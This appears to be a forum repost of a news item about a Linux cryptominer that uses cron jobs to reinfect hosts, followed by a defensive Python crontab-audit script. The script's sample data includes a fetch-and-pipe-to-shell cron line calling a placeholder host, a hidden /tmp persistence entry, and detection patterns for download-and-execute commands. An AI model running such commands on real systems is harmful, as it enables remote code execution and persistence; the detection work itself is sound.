Cryptominer Uses Cron To Reinfect Linux Host After Removal

silversurfer

A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed.

The malware was initially discovered on a web server with a maxed-out CPU by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources.

As Sucuri's security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method — most probably after exploiting an unpatched vulnerability, brute-forcing their way in, or by phishing the admin credentials.
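Because the persistence described above lives in cron, killing the miner process is not enough; the crontabs need auditing too. The following is an added example, not part of the original post or of Sucuri's analysis: a small audit that flags cron jobs which fetch remote content and hand it to a shell. The patterns, severity labels and the sample crontab are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Heuristics are assumptions for illustration, not indicators from the report.
RULES = {
    "downloads remote content": re.compile(r"\b(curl|wget)\b"),
    "pipes into a shell": re.compile(r"\|\s*(ba|da|z)?sh\b"),
    "decodes base64": re.compile(r"\bbase64\s+(-d|--decode)\b"),
    "references a world-writable dir": re.compile(r"(?:^|[\s;&|(])(?:/tmp|/var/tmp|/dev/shm)/\S+"),
}
JOB_LINE = re.compile(r"^(@\w+|\S+(\s+\S+){4})\s+\S")  # @reboot or 5 time fields
ENV_LINE = re.compile(r"^\w+\s*=")                     # MAILTO=..., PATH=...
CRON_GLOBS = ["etc/crontab", "etc/cron.d/*", "var/spool/cron/*", "var/spool/cron/crontabs/*"]

# Constructed sample crontab; example.invalid is a placeholder host.
SAMPLE = """\
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://example.invalid/x.sh | sh
@reboot /tmp/.cache/kworker >/dev/null 2>&1
*/5 * * * * curl -s https://status.example.invalid/ping
"""

def audit_text(text, source="<sample>"):
    """Return (source, line number, severity, reasons, entry) per suspicious job."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if entry.startswith("#") or ENV_LINE.match(entry) or not JOB_LINE.match(entry):
            continue
        reasons = [name for name, rx in RULES.items() if rx.search(entry)]
        if reasons:
            # A download combined with any other signal is the dropper-like shape.
            high = "downloads remote content" in reasons and len(reasons) > 1
            findings.append((source, lineno, "high" if high else "review", reasons, entry))
    return findings

def audit_host():
    """Scan system and per-user crontabs; run as root to read every spool file."""
    findings = []
    for pattern in CRON_GLOBS:
        try:
            for path in Path("/").glob(pattern):
                if path.is_file():
                    findings += audit_text(path.read_text(errors="replace"), str(path))
        except OSError:
            continue  # directory or file not readable by this user
    return findings

if __name__ == "__main__":
    for finding in audit_text(SAMPLE) + audit_host():
        print(*finding, sep=" | ")
```

A "review" result is only a prompt to look: plain `curl` health checks are common in legitimate crontabs, so compare hits against a known-good baseline before removing anything.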
 
